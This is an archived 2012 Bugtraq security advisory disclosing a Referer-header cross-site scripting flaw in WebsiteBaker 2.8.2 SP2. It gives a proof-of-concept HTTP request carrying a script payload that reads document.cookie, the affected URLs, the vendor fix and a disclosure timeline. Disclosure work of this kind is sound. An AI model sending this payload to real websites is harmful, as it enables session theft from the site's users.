lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 18 Feb 2012 12:37:09 GMT
From: sschurtz@...ksecurity.de
To: bugtraq@...urityfocus.com
Subject: WebsiteBaker 2.8.2 SP2 HTTP-Referer XSS vulnerability

Advisory:		WebsiteBaker 2.8.2 SP2 HTTP-Referer XSS vulnerability
Advisory ID:		SSCHADV2012-003
Author:			Stefan Schurtz
Affected Software:	Successfully tested on WebsiteBaker 2.8.2 SP2
Vendor URL:		www.websitebaker2.org
Vendor Status:		fixed 

==========================
Vulnerability Description
==========================

HTTP-Referer in WebsiteBaker 2.8.2 SP2 is prone to a XSS vulnerability

==================
PoC-Exploit
==================

http://[target]/wb/search/index.php
http://[target]/wb/account/forgot.php

Host: [target]
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: '"/><script>alert(document.cookie)</script>

=========
Solution
=========

Upgrade to WebsiteBaker 2.8.3 

====================
Disclosure Timeline
====================

31-Jan-2012 - vendor informed
31-Jan-2012 - release date of this security advisory
13-Feb-2012 - fixed by vendor 

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-003.txt

Powered by blists - more mailing lists